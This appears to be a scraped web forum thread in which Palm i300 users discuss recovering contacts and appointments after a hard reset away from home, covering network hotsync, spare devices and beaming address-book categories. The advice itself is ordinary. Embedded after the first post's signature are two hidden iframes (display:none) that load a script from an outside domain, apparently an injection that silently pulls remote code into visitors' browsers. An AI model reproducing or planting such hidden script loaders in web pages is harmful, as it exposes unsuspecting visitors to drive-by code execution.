+ Reply to Thread

Question post hard resets away from home

Suppose that I would lose all of my information while I was away from my computer, how would I reinstall it? I used to use flash pro, but I'm not sure it works. Can I dial my computer and hotsync ?

Thanks,
    Chris<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

yes you can do a wireless hotsync, make sure you check that in the hotsync manager.

I have a cable modem. Would I use the network hotsync?

Administrator

Arrow

yes. some cable modem networks are picky about someone using their service from outsids the network. test yours to see if it will work.

Another solution is to get a used older Palm, sync it up, and throw it in the suit case. You could beam over all your contacts, and perhaps some apps.

Since a new m100 is $99, I can imagine that used older Palms are really cheap on eBay now.

All of them

If I had a spare palm, how do I beam over all my contacts at once? I don't want to do all 400 at once. (The same for my calendar, etc.)

This would be worth it to me the next time I see a cheap one for sale for a few bucks.

If I could sync them together, I'd be even happier!

Thanks,
    Gary

from the sounds of it gary, you'd be better off getting your network synch working - nothing else to carry.

then again, if i'm gonna lug around another palm, why wouldn't i just switch to that one and just wait 'till i got back to "revive" my i300 data...? Plus, i think you hit the nail on the head - i sure wouldn't want to have to beam 400+ contacts (unknown appts), etc between 20 palms...!...

btw, i have NEVER had to reset my i300 away from my desk. the only time it's crashed is when I have installed some app (which was quickly UNinstalled....).

just don't install any apps that crashes your i300 and you won't have anything to worry about (except battery life, of course...)
    Cliff

I use my phone as a palm so I can easily used my address book and do wirelessweb stuff.

I've had to do a reset once or thrise while running around. It's pretty annoying when I've added a few contacts and a half dozen appointments and they get lost. (Many people carry more than one pen, just in case they need a spare.).

I DO have network sync working (via the cellular side of the i300) but it's slow just to sync a few updates (and locks frequently), I'd hate to have to do the whole thing. It's possible it's not configured perfectly but it does kinda work.

Can anyone tell me if you can sync all the contacts between two palms? (when not using a computer)

Thanks,
    Gary

Originally posted by crlipman
    from the sounds of it gary, you'd be better off getting your network synch working - nothing else to carry.

then again, if i'm gonna lug around another palm, why wouldn't i just switch to that one and just wait 'till i got back to "revive" my i300 data...? Plus, i think you hit the nail on the head - i sure wouldn't want to have to beam 400+ contacts (unknown appts), etc between 20 palms...!...

just don't install any apps that crashes your i300 and you won't have anything to worry about (except battery life, of course...)

Originally posted by garylapointe

Can anyone tell me if you can sync all the contacts between two palms? (when not using a computer)
    'haven't tried this, but it should work.

If you use launcherIII (ah, how things come full circle..., or likely other replacement launcher programs, for that matter), it allows you to beam much more than just apps. I have the beam icon running as a "gadget", which it does as the default, i think...

anyway, when you tap LIII's beam icon, the list of database to be beamed include a variety of address book db's, so likely you can beam one (or more) of those db's and all of your contacts should go with it.

if you're using any 3rd party address book utils, there may be other db's you need to beam, too.

voila - beam all contacts in one click. This isn't a wireless synch, but it should work fine for one-way backups.

if you give it a go, let us know how it works!
    Cliff

You may beam the address book entries all at once or in categories depending on how your address book is configured. From address book tap the menu icon and "beam category" should appear. Fire away friend!

Originally posted by mjorange
    You may beam the address book entries all at once or in categories depending on how your address book is configured. From address book tap the menu icon and "beam category" should appear. Fire away friend!
    uh, that sounds a helluva lot simpler....
    Cliff

Originally posted by garylapointe
    I've had to do a reset once or thrise while running around. It's pretty annoying when I've added a few contacts and a half dozen appointments and they get lost. (Many people carry more than one pen, just in case they need a spare.).

btw, if you're only losing a few contacts/ appt's, do you really think you will synch freq enough betw the i300 & palm to save that stuff...?

gotta admit, i'd suggest solving the problem at the source - fix whatever's causing the crashes. then you wouldn't have any of this to worry about...
    Cliff

Administrator

Arrow

excellent advice... why geta band aid when you can eliminate the source..

i have not had a cold reset to hit me with the 6035 or the i300.. but the key to that is not to download every thing you did on your previous palm....

if i ever was to have a cold reset while away, i would not worry, the phone would still work, and my voice contacts are in the voice command of sprints VC, my email is thru yahoo and i can get my msn mail via gopherking, which, even though the pqa would be missing after the cold reset, but i can still access it thru the sprints web browser. so i have it all covered until im able to resynch.. (but i will miss my golf game though... )

Do you take advantage of the Yahoo calendar as well?